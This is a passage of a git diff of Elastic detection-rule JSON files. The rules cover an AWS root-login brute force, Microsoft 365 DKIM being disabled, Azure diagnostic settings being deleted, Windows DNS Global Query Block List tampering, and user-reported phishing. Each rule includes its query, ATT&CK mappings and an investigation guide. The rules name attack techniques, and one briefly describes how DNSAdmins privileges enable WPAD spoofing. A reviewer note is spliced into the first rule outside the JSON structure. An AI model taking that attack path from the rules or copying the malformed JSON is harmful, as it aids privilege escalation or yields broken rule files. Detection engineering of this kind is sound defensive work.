authenticate using expired credentials and unbounded retries may lead to false positives." 
+ ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "cloud.account.id" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Management Console Brute Force of Root User Identity", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS Management Console Brute Force of Root User Identity\n\nThe AWS Management Console provides a web interface for managing AWS resources. Because the root user has unrestricted privileges, repeated failed console login attempts targeting this identity represent a high-risk credential access event. Even if no login succeeded, this activity may indicate reconnaissance, password spraying, or credential stuffing attempts targeting the root user.\n\nThis threshold rule detects a high number of failed `ConsoleLogin` events (`event.outcome: failure` with `userIdentity.type: Root`) for the same AWS account (`cloud.account.id`) within a short timeframe. \nThreshold rules only summarize grouped field values, so analysts must use Timeline to review the actual events that triggered the alert.\n\n#### Possible investigation steps\n\n- **Review in Timeline.** \n Open the alert and *Investigate in timeline* to view the individual CloudTrail events contributing to the threshold alert. Review: \n - `source.ip`, `user_agent.original`, `geo fields` and `@timestamp` for each failure. \n - Look for patterns such as distributed sources or repeated retries at consistent intervals. \n - Look for any corresponding successful `ConsoleLogin` events around the same timeframe from the same IP or agent.\n\n- **Assess IP reputation and geolocation.** \n Use IP intelligence tools to evaluate whether the source addresses belong to known cloud providers, TOR nodes, or foreign regions outside your normal operations. \n - Correlate against `cloud.region` and `geo fields` and compare with expected login locations for your organization.\n\n- **Check for related activity.** \n Review CloudTrail for other API calls from the same source IP (for example, `GetSessionToken`, `AssumeRole`, or `ListUsers`) that may indicate scripted credential testing or discovery.\n\n- **Correlate with GuardDuty findings.** \n GuardDuty may raise complementary findings for anomalous console login behavior or brute force attempts. Review recent GuardDuty and AWS Config alerts for the same timeframe.\n\n- **Determine business context.** \n Confirm whether the source IPs are internal (for example, corporate VPN, IT admin network) or part of legitimate red-team or third-party testing. If uncertain, treat as suspicious.\n\n### False positive analysis\n\n- **Forgotten or mistyped credentials.** \n Repeated failed logins from known internal IPs could indicate typing errors by a legitimate user. Validate by checking if a successful root login followed soon after. \n- **Automation or scanners.** \n Misconfigured monitoring tools or old browser sessions attempting to reuse cached credentials may trigger this rule. \n- **Planned penetration testing.** \n Red-team or security testing activities can generate deliberate brute force attempts. 
Verify via ticketing or testing schedules.\n\n### Response and remediation\n\n> The AWS Incident Response Playbooks classify root login attempts as Priority-1 credential compromise events. \n> Follow these steps whether or not your organization has a formal IR team.\n\n**1. Immediate containment**\n- **Check for success.** \n After pivoting to Timeline, confirm whether any `ConsoleLogin` events from the same IP or user agent show `event.outcome: success`. \n - If a successful login occurred, immediately follow the *AWS Management Console Root Login* rule investigation guide. \n- **Rotate the root password.** \n Use AWS\u2019s password reset function to set a strong, unique password stored in an offline vault. \n- **Enable or verify Multi-Factor Authentication (MFA)** on the root account. If MFA was already configured, review the device registration for changes or suspicious resets. \n- **Block offending IPs or networks.** \n Use AWS WAF, VPC network ACLs, or Security Groups to temporarily block the IPs used in the failed attempts. \n- **Alert internal teams.** \n Notify your security operations or cloud governance teams of the brute force pattern and actions taken.\n\n**2. Evidence preservation**\n- Export all failed `ConsoleLogin` events visible in Timeline (\u00b130 minutes around the alert window) to a restricted evidence bucket. \n- Preserve GuardDuty findings, AWS Config history, and CloudTrail logs for the same timeframe for further analysis.\n\n**3. Scoping and investigation**\n- Query CloudTrail across other AWS accounts and regions for additional failed or successful `ConsoleLogin` events from the same IPs. \n- Check IAM activity for simultaneous key creation, role modifications, or new users \u2014 signs of lateral or parallel intrusion attempts. \n- Review network telemetry (VPC Flow Logs, CloudFront, WAF) to determine whether the activity originated from a distributed or scripted attack pattern.\n\n**4. Recovery and hardening**\n- Confirm MFA is enabled and enforced on the root account. \n- Remove any root access keys (none should exist under normal security posture). \n- Enable organization-wide CloudTrail, GuardDuty, and Security Hub across all regions. \n- Set up real-time alerts for any future `ConsoleLogin` failures from the root user exceeding expected baselines. \n- Store root credentials offline with dual-custody and document controlled access procedures.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/tree/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks):** See \u201cCredential Compromise\u201d and \u201cAccount Compromise\u201d for investigation, containment, and escalation guidance. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs):** Reference runbooks for failed-login response, evidence preservation, and MFA enforcement. \n- **AWS Documentation:** [Tasks that require the root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). 
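Reviewer note (not part of the packaged rule JSON): the "Check for success" pivot described in the guide above could be run from the ES|QL editor with a sketch like the one below. Field names are taken from the rule and its guide; the index pattern is assumed from the rule's `index` setting.

```esql
// Illustrative sketch of the "Check for success" pivot.
// Lists successful root console logins to compare against the failed attempts.
from logs-aws.cloudtrail*
| where event.provider == "signin.amazonaws.com"
  and event.action == "ConsoleLogin"
  and aws.cloudtrail.user_identity.type == "Root"
  and event.outcome == "success"
| keep @timestamp, cloud.account.id, source.ip, user_agent.original, cloud.region
| sort @timestamp desc
```

Any hits from a sketch like this would warrant following the *AWS Management Console Root Login* guide referenced above.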
\n", + "query": "event.dataset:aws.cloudtrail and \nevent.provider:signin.amazonaws.com and \nevent.action:ConsoleLogin and \naws.cloudtrail.user_identity.type:Root and \nevent.outcome:failure\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4d50a94f-2844-43fa-8395-6afbd5e1c5ef", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "cloud.account.id" + ], + "value": 10 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 211 + }, + "id": "4d50a94f-2844-43fa-8395-6afbd5e1c5ef_211", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_207.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_207.json deleted file mode 100644 index e162c793e21..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_207.json +++ /dev/null @@ -1,94 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed.", - "false_positives": [ - "Disabling a DKIM configuration may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange DKIM Signing Configuration Disabled", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. 
While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange DKIM Signing Configuration Disabled\n\nDomainKeys Identified Mail (DKIM) is a security protocol that ensures email authenticity by allowing recipients to verify that messages are sent from authorized servers. Disabling DKIM can expose organizations to email spoofing, where attackers impersonate legitimate domains to conduct phishing attacks. The detection rule identifies when DKIM is disabled in Microsoft 365, signaling potential unauthorized changes that could facilitate persistent threats.\n\n### Possible investigation steps\n\n- Review the audit logs in Microsoft 365 to identify the user or service account associated with the event.action \"Set-DkimSigningConfig\" where o365.audit.Parameters.Enabled is False. This will help determine who or what initiated the change.\n- Check the event.timestamp to establish when the DKIM signing configuration was disabled and correlate this with any other suspicious activities or changes in the environment around the same time.\n- Investigate the event.outcome field to confirm that the action was successful and not a failed attempt, which could indicate a misconfiguration or unauthorized access attempt.\n- Examine the event.provider and event.category fields to ensure that the event is specifically related to Exchange and web actions, confirming the context of the alert.\n- Assess the risk score and severity level to prioritize the investigation and determine if immediate action is required to mitigate potential threats.\n- Look into any recent changes in administrative roles or permissions that could have allowed unauthorized users to disable DKIM signing, focusing on persistence tactics as indicated by the MITRE ATT&CK framework reference.\n\n### False positive analysis\n\n- Routine administrative changes: Sometimes, DKIM signing configurations may be disabled temporarily during routine maintenance or updates by authorized IT personnel. To manage this, establish a process to document and approve such changes, and create exceptions in the monitoring system for these documented events.\n- Testing and troubleshooting: IT teams may disable DKIM as part of testing or troubleshooting email configurations. Ensure that these activities are logged and approved, and consider setting up alerts that differentiate between test environments and production environments to reduce noise.\n- Configuration migrations: During migrations to new email systems or configurations, DKIM may be disabled as part of the transition process. Implement a change management protocol that includes notifying the security team of planned migrations, allowing them to temporarily adjust monitoring rules.\n- Third-party integrations: Some third-party email services may require DKIM to be disabled temporarily for integration purposes. 
Maintain a list of approved third-party services and create exceptions for these specific cases, ensuring that the security team is aware of and has approved the integration.\n\n### Response and remediation\n\n- Immediately re-enable DKIM signing for the affected domain in Microsoft 365 to restore email authenticity and prevent potential spoofing attacks.\n- Conduct a review of recent administrative activities in Microsoft 365 to identify any unauthorized changes or suspicious behavior that may have led to the DKIM configuration being disabled.\n- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized change and potential risks associated with it.\n- Implement additional monitoring on the affected domain and related accounts to detect any further unauthorized changes or suspicious activities.\n- Review and update access controls and permissions for administrative accounts in Microsoft 365 to ensure that only authorized personnel can modify DKIM settings.\n- Escalate the incident to the organization's incident response team for further investigation and to determine if any additional security measures are necessary.\n- Consider implementing additional email security measures, such as SPF and DMARC, to complement DKIM and enhance overall email security posture.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Set-DkimSigningConfig\" and o365.audit.Parameters.Enabled:False and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.Enabled", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "514121ce-c7b6-474a-8237-68ff71672379", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1556", - "name": "Modify Authentication Process", - "reference": "https://attack.mitre.org/techniques/T1556/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "514121ce-c7b6-474a-8237-68ff71672379_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_103.json b/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_103.json deleted file mode 100644 index 6d977c8be0c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_103.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "attributes": { - "author": [ 
- "Elastic" - ], - "description": "Identifies the deletion of diagnostic settings in Azure, which send platform logs and metrics to different destinations. An adversary may delete diagnostic settings in an attempt to evade defenses.", - "false_positives": [ - "Deletion of diagnostic settings may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Diagnostic settings deletion from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Diagnostic Settings Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Diagnostic Settings Deletion\n\nAzure Diagnostic Settings are crucial for monitoring and logging platform activities, sending data to various destinations for analysis. Adversaries may delete these settings to hinder detection and analysis of their activities, effectively evading defenses. The detection rule identifies such deletions by monitoring specific Azure activity logs for successful deletion operations, flagging potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by filtering for the operation name \"MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE\" and ensuring the event outcome is marked as Success.\n- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs.\n- Check the timestamp of the deletion event to determine when the diagnostic settings were removed and correlate this with other security events or alerts around the same time.\n- Investigate the affected resources by identifying which diagnostic settings were deleted and assess the potential impact on monitoring and logging capabilities.\n- Review any recent changes or activities performed by the identified user or service principal to determine if there are other suspicious actions that might indicate malicious intent.\n- Assess the current security posture by ensuring that diagnostic settings are reconfigured and that logging and monitoring are restored to maintain visibility into platform activities.\n\n### False positive analysis\n\n- Routine maintenance activities by authorized personnel may trigger the rule. Ensure that maintenance schedules are documented and align with the detected events.\n- Automated scripts or tools used for managing Azure resources might delete diagnostic settings as part of their operation. Review and whitelist these scripts if they are verified as non-threatening.\n- Changes in organizational policy or compliance requirements could lead to legitimate deletions. Confirm with relevant teams if such policy changes are in effect.\n- Test environments often undergo frequent configuration changes, including the deletion of diagnostic settings. 
Consider excluding these environments from the rule or adjusting the rule to account for their unique behavior.\n- Ensure that any third-party integrations or services with access to Azure resources are reviewed, as they might inadvertently delete diagnostic settings during their operations.\n\n### Response and remediation\n\n- Immediately isolate affected Azure resources to prevent further unauthorized changes or deletions. This may involve temporarily restricting access to the affected subscriptions or resource groups.\n- Review the Azure activity logs to identify the source of the deletion request, including the user account and IP address involved. This will help determine if the action was authorized or malicious.\n- Recreate the deleted diagnostic settings as soon as possible to restore logging and monitoring capabilities. Ensure that logs are being sent to secure and appropriate destinations.\n- Conduct a thorough investigation of the user account involved in the deletion. If the account is compromised, reset credentials, and review permissions to ensure they are appropriate and follow the principle of least privilege.\n- Escalate the incident to the security operations team for further analysis and to determine if additional resources or expertise are needed to address the threat.\n- Implement additional monitoring and alerting for similar deletion activities to ensure rapid detection and response to future attempts.\n- Review and update access controls and policies related to diagnostic settings to prevent unauthorized deletions, ensuring that only trusted and necessary personnel have the ability to modify these settings.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/azure-monitor/platform/diagnostic-settings" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/57bfa0a9-37c0-44d6-b724-54bf16787492_208.json 
b/packages/security_detection_engine/kibana/security_rule/57bfa0a9-37c0-44d6-b724-54bf16787492_208.json new file mode 100644 index 00000000000..d2ea6915605 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/57bfa0a9-37c0-44d6-b724-54bf16787492_208.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies changes to the DNS Global Query Block List (GQBL), a security feature that prevents the resolution of certain DNS names often exploited in attacks like WPAD spoofing. Attackers with certain privileges, such as DNSAdmins, can modify or disable the GQBL, allowing exploitation of hosts running WPAD with default settings for privilege escalation and lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "endgame-*", + "logs-crowdstrike.fdr*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "DNS Global Query Block List Modified or Disabled", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating DNS Global Query Block List Modified or Disabled\n\nThe DNS Global Query Block List (GQBL) is a security feature in Windows environments that blocks the resolution of specific DNS names, such as WPAD, to prevent attacks like spoofing. Adversaries with elevated privileges can alter or disable the GQBL, enabling them to exploit default settings for privilege escalation. The detection rule monitors registry changes indicating such modifications, flagging potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the registry event logs to confirm the specific changes made to the DNS Global Query Block List, focusing on the registry values \"EnableGlobalQueryBlockList\" and \"GlobalQueryBlockList\".\n- Identify the user account associated with the registry change event to determine if the account has elevated privileges, such as DNSAdmins, which could indicate potential misuse.\n- Check for any recent changes in user permissions or group memberships that might have granted the necessary privileges to modify the GQBL.\n- Investigate any other suspicious activities or alerts related to the same user or host around the time of the registry change to identify potential lateral movement or privilege escalation attempts.\n- Correlate the event with network traffic logs to detect any unusual DNS queries or attempts to resolve WPAD or other blocked names, which could suggest exploitation attempts.\n- Review system and security logs for any signs of unauthorized access or other indicators of compromise on the affected host.\n\n### False positive analysis\n\n- Legitimate administrative changes to DNS settings by IT staff can trigger the rule. To manage this, create exceptions for known maintenance windows or authorized personnel making these changes.\n- Automated scripts or software updates that modify DNS settings might be flagged. 
Identify and whitelist these processes if they are verified as safe and necessary for system operations.\n- Changes made by security tools or network management software that adjust DNS settings for legitimate reasons can be mistaken for threats. Review and exclude these tools from monitoring if they are part of the organization's approved security infrastructure.\n- In environments where WPAD is intentionally used, the absence of \"wpad\" in the GlobalQueryBlockList might be a normal configuration. Document and exclude these cases if they align with the organization's network design and security policies.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further exploitation or lateral movement.\n- Revert any unauthorized changes to the DNS Global Query Block List by restoring the registry settings to their default state, ensuring WPAD and other critical entries are included.\n- Conduct a thorough review of user accounts with elevated privileges, such as DNSAdmins, to identify any unauthorized access or privilege escalation. Revoke unnecessary privileges and reset credentials as needed.\n- Deploy endpoint detection and response (EDR) tools to scan the affected system for additional indicators of compromise or malicious activity, focusing on defense evasion techniques.\n- Monitor network traffic for signs of WPAD spoofing or other related attacks, and implement network segmentation to limit the impact of potential threats.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Update security policies and procedures to include specific measures for monitoring and protecting the DNS Global Query Block List, ensuring rapid detection and response to similar threats in the future.", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and registry.data.strings != null and\n(\n (registry.value : \"EnableGlobalQueryBlockList\" and registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.value : \"GlobalQueryBlockList\" and not registry.data.strings : \"wpad\")\n)\n", + "references": [ + "https://cube0x0.github.io/Pocing-Beyond-DA/", + "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/wpad-spoofing", + "https://www.netspi.com/blog/technical-blog/network-penetration-testing/adidns-revisited/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "57bfa0a9-37c0-44d6-b724-54bf16787492", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Resources: 
Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1557", + "name": "Adversary-in-the-Middle", + "reference": "https://attack.mitre.org/techniques/T1557/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 208 + }, + "id": "57bfa0a9-37c0-44d6-b724-54bf16787492_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_207.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_207.json deleted file mode 100644 index 0a3fa0d9638..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_207.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks.", - "false_positives": [ - "Legitimate files reported by the users" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "O365 Email Reported by User as Malware or Phish", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating O365 Email Reported by User as Malware or Phish\n\nMicrosoft 365's email services are integral to business communication, but they can be exploited by adversaries through phishing or malware-laden emails. Attackers may bypass security measures, reaching users who might unwittingly engage with malicious content. 
The detection rule leverages user reports of suspicious emails, correlating them with security events to identify potential threats, thus enhancing the organization's ability to respond to phishing attempts and malware distribution.\n\n### Possible investigation steps\n\n- Review the details of the alert triggered by the rule \"Email reported by user as malware or phish\" in the SecurityComplianceCenter to understand the context and specifics of the reported email.\n- Examine the event dataset from o365.audit to gather additional information about the email, such as sender, recipient, subject line, and any attachments or links included.\n- Correlate the reported email with other security events or alerts to identify any patterns or related incidents that might indicate a broader phishing campaign or malware distribution attempt.\n- Check the user's report against known phishing or malware indicators, such as suspicious domains or IP addresses, using threat intelligence sources to assess the credibility of the threat.\n- Investigate the user's activity following the receipt of the email to determine if any actions were taken that could have compromised the system, such as clicking on links or downloading attachments.\n- Assess the effectiveness of current security controls and awareness training by analyzing how the email bypassed existing defenses and was reported by the user.\n\n### False positive analysis\n\n- User-reported emails from trusted internal senders can trigger false positives. Encourage users to verify the sender's identity before reporting and consider adding these senders to an allowlist if they are consistently flagged.\n- Automated system notifications or newsletters may be mistakenly reported as phishing. Educate users on recognizing legitimate automated communications and exclude these sources from triggering alerts.\n- Emails containing marketing or promotional content from known vendors might be reported as suspicious. Train users to differentiate between legitimate marketing emails and phishing attempts, and create exceptions for verified vendors.\n- Frequent reports of emails from specific domains that are known to be safe can lead to unnecessary alerts. 
Implement domain-based exceptions for these trusted domains to reduce false positives.\n- Encourage users to provide detailed reasons for reporting an email as suspicious, which can help in refining detection rules and reducing false positives over time.\n\n### Response and remediation\n\n- Isolate the affected email account to prevent further interaction with potentially malicious content and to stop any ongoing unauthorized access.\n- Quarantine the reported email and any similar emails identified in the system to prevent other users from accessing them.\n- Conduct a thorough scan of the affected user's device and network for any signs of malware or unauthorized access, using endpoint detection and response tools.\n- Reset the credentials of the affected user account and any other accounts that may have been compromised to prevent further unauthorized access.\n- Notify the security team and relevant stakeholders about the incident, providing details of the threat and actions taken, to ensure coordinated response efforts.\n- Review and update email filtering and security policies to address any identified gaps that allowed the malicious email to bypass existing controls.\n- Monitor for any further suspicious activity related to the incident, using enhanced logging and alerting mechanisms to detect similar threats in the future.", - "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n", - "references": [ - "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": true, - "name": "rule.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "5930658c-2107-4afc-91af-e0e55b7f7184", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/", - "subtechnique": [ - { - "id": "T1566.001", - "name": "Spearphishing Attachment", - "reference": "https://attack.mitre.org/techniques/T1566/001/" - }, - { - "id": "T1566.002", - "name": "Spearphishing Link", - "reference": "https://attack.mitre.org/techniques/T1566/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "5930658c-2107-4afc-91af-e0e55b7f7184_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_207.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_207.json deleted file mode 100644 index 0869f42f28d..00000000000 --- 
